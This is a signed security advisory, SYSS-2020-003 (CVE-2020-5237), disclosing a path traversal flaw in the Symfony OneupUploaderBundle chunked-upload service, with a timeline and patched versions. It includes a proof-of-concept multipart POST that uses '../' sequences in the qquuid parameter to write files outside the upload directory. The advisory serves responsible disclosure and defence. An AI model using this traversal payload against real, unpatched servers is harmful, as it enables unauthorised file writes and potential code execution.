-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2020-003 Product: OneupUploaderBundle Manufacturer: 1up GmbH Affected Version(s): before 1.9.3 and 2.1.5 Tested Version(s): 1.4.0 and 2.1.4 Vulnerability Type: Relative Path Traversal (CWE-23) Risk Level: High Solution Status: Fixed Manufacturer Notification: 2020-01-30 Solution Date: 2020-02-04 Public Disclosure: 2020-02-04 CVE Reference: CVE-2020-5237 Author of Advisory: Thibaud Kehler, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: OneupUploaderBundle is a library that adds support to the PHP web application framework Symfony for handling file uploads from a variety of web frontends. The manufacturer describes the product as follows (see [1]): "This Symfony bundle provides a server implementation for handling single and multiple file uploads using either FineUploader, jQuery File Uploader, YUI3 Uploader, Uploadify, FancyUpload, MooUpload, Plupload or Dropzone. Features include chunked uploads, orphanages, Gaufrette and Flysystem support." Due to missing validation of user input, the provided web service is vulnerable to path traversal attacks. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: The vulnerability was identified in the web service for a chunked file upload. While the names of the POST parameters vary with the used frontend, their values are always used in the same way to build a path where the chunks are stored and assembled temporarily. By not validating these parameters properly, OneupUploaderBundle is susceptible to a path traversal vulnerability which can be exploited to upload files to arbitrary folders on the filesystem. The assembly process can further be misused with some restrictions to delete and copy files to other locations. The vulnerability can be exploited by any users that have legitimate access to the upload functionality and can lead to arbitrary code execution, denial of service and disclosure of confidential information. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): When the web service is configured to accept files from the JavaScript frontend "FineUploader", it processes the parameters "qquuid", "qqpartindex" and "qqfilename" from the HTTP request. Similar approaches worked with the variants for the frontends "Blueimp" (jQuery), "Dropzone", "MooUpload" and "Plupload". The default configuration saves the chunks in the following directory relative to the application directory: var/cache/{servername}/uploader/chunks/{qquuid}/{qqpartindex}_{qqfilename} Since the parameters are not sanitized, it is possible to upload files outside of that directory structure, e.g. with the following request: POST /_uploader/gallery/upload HTTP/1.1 Host: webapp.tld Content-Type: multipart/form-data; boundary=--12345 Content-Length: 455 - ----12345 Content-Disposition: form-data; name="qqpartindex" 1 - ----12345 Content-Disposition: form-data; name="qqtotalparts" 3 - ----12345 Content-Disposition: form-data; name="qqfilename" poc.txt - ----12345 Content-Disposition: form-data; name="qquuid" ../../../../../poc/ - ----12345 Content-Disposition: form-data; name="qqfile"; filename="poc.txt" Content-Type: application/octet-stream This file should not be here! - ----12345-- If the process of the web server has sufficient permissions, the file is created in a new directory "poc/1_poc.txt" in the application directory. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: Update to version 1.9.3 or 2.1.5 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2020-01-27: Vulnerability discovered 2020-01-30: Vulnerability reported to manufacturer 2020-02-04: Patch released by manufacturer 2020-02-04: Public disclosure of vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Github repository for OneupUploaderBundle https://github.com/1up-lab/OneupUploaderBundle [2] Security Advisory on Github https://github.com/1up-lab/OneupUploaderBundle/security/advisories/GHSA-x8wj-6m73-gfqp [2] Manufacturer website https://1up.io/ [3] SySS Security Advisory SYSS-2020-003 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2020-003.txt [4] SySS Responsible Disclosure Policy https://www.syss.de/en/news/responsible-disclosure-policy/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Thibaud Kehler of SySS GmbH. E-Mail: thibaud.kehler@syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Thibaud_Kehler.asc Key ID: 0xB6457D7A Key Fingerprint: CF29 54F1 1B7F 2FF5 7ED9 9BAD E9C7 9866 B645 7D7A ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS Web site. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEEzylU8Rt/L/V+2Zut6ceYZrZFfXoFAl5BUYYACgkQ6ceYZrZF fXpdQg//XrI6LZlka6wHTyQR0OUUGYij46KjwZvsEJq8L2oFFl+Qa9Hs4OD3P22S Ibib0F/oZ0nBCMNsHI10oGnw4DOoe+Dlam0LjwgM2oH0NrVbdmZYgGdHoO+xq48p 9Jlcn0tCUo/YAHUog+J4WQ1eDyjKa2Tgipm0BAuPGEM2uKm/jvNfSeTp4bmoJ+aP nJWlKftCTmAPUzxp5OLlysonlUh7KiNose2PiT+o6u3pjFxxJQUE5bbCfkJQa2l7 YSvm2t8MjkBUOxlT/V22gSEE/+XSYuo0+XjHYiENXI0YwmCmIRz1uCEKrfdfo36F SM1pG9/R3pio2kVnA27izHxRiqNOXe4Ivc/XRuoOULR/rDDe72tYSwG60mQD8P45 3lGuvVeXPT2LU6xitlMF0x5AZ3NMNpYg9QuDX6QczOPVCg9vnk3dogUTf+U0mslH Wm3kd3gRawA++DnRk8wLQYAqBGfXkv6uLgpt5bH/ephFwN7hMO88YBovGtzkEtoY WImDhqITwwCes9hO8G1BLz9W9yCyoOkS7XHNVNUkM4IMKw6QSOCWUSszrD9BEkdj dIUxyaXEHSOAbUOMZGwWtsrN2WO5FWvlnoI1pQJh5IDf4GM74zMtEzTnGSednfN9 VybpJxCrcNsoYnkyM8drfdyb+gSmZM19oA6Q7tKHaIvk9B2l7OA= =uJEr -----END PGP SIGNATURE-----